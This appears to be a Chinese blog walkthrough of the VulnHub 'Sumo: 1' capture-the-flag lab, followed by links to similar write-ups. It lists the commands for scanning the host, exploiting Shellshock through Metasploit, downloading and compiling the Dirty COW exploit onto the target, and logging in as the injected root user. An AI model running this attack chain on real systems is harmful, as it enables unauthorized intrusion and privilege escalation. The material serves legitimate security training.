VulnHub之Sumo:1

2021-02-14 安全孺子牛
虛擬機信息:

虛擬機下載地址:https://www.vulnhub.com/entry/sumo-1,480/

虛擬機簡介:獲取root下的flag

目標:1個flag

級別:初級

1、通過netdiscover檢測主機IP位址
netdiscover -r 192.168.207.0/24


2、通過nmap進行埠掃描
nmap -A -sS -sV -v -p- 192.168.207.174

查看只開放22和80埠

3、WEB滲透測試3.1 使用dirb進行掃描沒有發現有用信息,使用nikto探測可能存在CVE-2014-6271和CVE-2014-6278漏洞
nikto -host http://192.168.207.174


3.2 使用metasploit搜索CVE-2014-6271


3.3 加載漏洞利用模塊

該模塊通過將HTTP_USER_AGENT環境變量設置為惡意函數定義來定位Apache Web伺服器中的CGI腳本

use exploit/multi/http/apache_mod_cgi_bash_env_execset rhosts 192.168.207.174set lhost 192.168.207.129set targeturi /cgi-bin/testexploit

3.4 使用sysinfo命令來發現計算機的作業系統是Ubuntu 12.04

3.5 較舊的作業系統具有易受攻擊的內核,使用髒牛進行漏洞提權


4、系統提權4.1 複製提權文件並開啟http服務

cp /usr/share/exploitdb/exploits/linux/local/40839.c ./python -m SimpleHTTPServer 80

4.2 靶機進入shell模式,並下載提權文件

shellpython -c 'import pty; pty.spawn("/bin/sh")'cd /tmpwget http:gcc -pthread 40839.c -o dirty -lcrypt

4.3 根據提權腳本使用方法

4.4 使用ssh連接靶機,用戶為firefart,密碼為12345,查看flag

ssh firefart@192.168.207.174cat /root/root.txt

相關焦點

  • VulnHub之Victim: 1
    虛擬機信息:虛擬機下載地址:https://www.vulnhub.com
  • VulnHub之MY FILE SERVER: 1
    虛擬機信息:虛擬機下載地址:https://www.vulnhub.com
  • vulnhub-DevGuru:1
    vulnhub-DevGuru:1http://192.168.3.243
  • vulnhub靶場之GameOver_v0.1_Null_VM
    0x00 vulnhub靶場之GameOver_v0.1_Null_VM傳送門:
  • Buzzsumo是什麼工具? 海外內容營銷最強工具Buzzsumo使用全指南
    在關於找紅人方面,前面我們寫過《Brand24–監測競品全渠道的一款好工具》一文,今天我們來聊下另外一個非常重磅的工具—Buzzsumo.Buzzsumo是一款做海外內容營銷的多功能神器,是做谷歌SEO的必備工具。數據上,它能將全球數以萬計來源的內容編入索引。
  • vulnhub靶機滲透-Connectthedots
    vulnhub靶機滲透-Connectthedots這個靶機比較腦洞,但是最後的提權過程挺有意思的。目標:/home/user.txt and /root/root.txt環境準備由於VMware會出現種種問題,於是改成了Virtual Box,而且Vulhub上的大部分靶機都是使用Virtual Box製作的附上一些相關的配置截圖:kali 2019.04第一塊網卡沒做修改添加了第二塊網卡vulnhub
  • vulnhub系列之靶機Kevgir練習
    1、靶機下載地址https://www.vulnhub.com/entry/kevgir-1,137/2、nmap -sn 192.168.1.0
  • Buzzsumo大型教程(內容營銷+外鏈outreach必備)營銷神器
    在國外就更不用說了,很多網絡營銷大牛眼裡,Buzzsumo的重要程度絕對超過Ahrefs!一全老師(www.yiquanseo.com)廢話一句:對有用的人很有用,對會用的人很有用,對其他人確實沒用,充其量看個熱鬧……下面我們詳細講下:先是大框架,Buzzsumo的主界面是這樣的:(Buzzsumo是付費工具,但是註冊之後可以免費用一周,一全老師現在用的就是一周免費的,所以帶個On Trial – Pay Now。
  • vulnhub之Os-hackNos-3的實踐
    好久沒做攻擊實踐了,今天看了一下,手裡還攢著6個vulnhub的鏡像,算了一下,整好春節前把它們都實踐完,今天實踐的是Os-hackNos-3,
  • vulnhub綜合靶場:MyExpense: 1
    1.靶機環境:官網地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/靶機安裝過程:1)下載得到對應的ova文件2.在VMware中打開,導入,選擇導入位置即可。
  • Vulnhub靶場攻略:ME AND MY GIRLFRIEND: 1
    遊戲目標本次靶場名為ME AND MY GIRLFRIEND: 1,一個初級難度的滲透實戰靶場,主要目標為收集到2個falg信息。環境搭建1、官網下載連接:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/2、下載之後,使用Oracle VM VirtualBox導入靶場環境3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可靶場攻略
  • VulnHub-BlueSky 1 靶場滲透測試
    •Name: BlueSky: 1•Date release: 10 Dec 2020•downpload:https://www.vulnhub.com/entry/bluesky-1,623/•Goal: Get the root shell i.e.
  • Vulnhub練習-Tr0ll 1
    難度:初學者;類型:boot2rootTroll-1的VulnHub機器的黑客攻擊。可以從下面的連結下載。https://www.vulnhub.com/entry/tr0ll-1,100/0x02 蓄謀我們這邊就把vlubhub | Tr0ll 安裝在了虛擬機l 攻擊端:Kali Linux 2019l 受害端:VMware Tr0ll
  • vulnhub系列之靶機Five86-2練習
    1、nmap -sn 192.168.1.0/24掃描區域網下的存活主機,找到靶機ip2、nmap -sS
  • vulnhub-DC-6靶機實戰
    下載地址 https://download.vulnhub.com/dc/DC-6.zip 開始滲透 主機探測:nmap -sP 192.168.1.*埠探測:nmap -sV -A -p- 192.168.1.42訪問web服務重定向到http://wordy/ 需要修改host文件,該站點為WordPress,首頁幾個頁面隨便看了下沒啥亮點,WordPress後臺路徑默認是wp-login.php 所以很容易想到
  • Vulnhub ——DC-7靶機
    今天又把vulnhub的dc-7給打了,過程有點繞虛擬機ip:192.168.64.129然後再找到存活在192.168.64.0
  • VulnHub| 實戰靶場ACID
    ----  網易雲熱評靶機下載地址: https://download.vulnhub.com/acid/Acid.rar  該靶機主分析web頁面拿到shell權限獲取flag。該靶機需登錄,不知ip號,所以先要獲取IP號,利用arp-scan工具, 命令為:arp-scan -l 。
  • 靶場滲透-Vulnhub-DC-6
    靶場地址:https://www.vulnhub.com/entry/dc-6,315/
  • Vulnhub-靶機-PWNOS: 2.0 (PRE-RELEASE)
    本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關靶機下載之後使用僅主機模式加載到本地VMware Workstation工作站,需要發現目標靶機的IP位址,可以使用nmap,netdiscover,或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1
  • Vulnhub-Gigachad靶機復現
    靶機介紹靶機地址:http://www.vulnhub.com/entry/gigachad-1,657/靶機難度:簡單靶機目標:get flag開整>一、虛擬機無法分配IP處理辦法1 進入下面界面按 e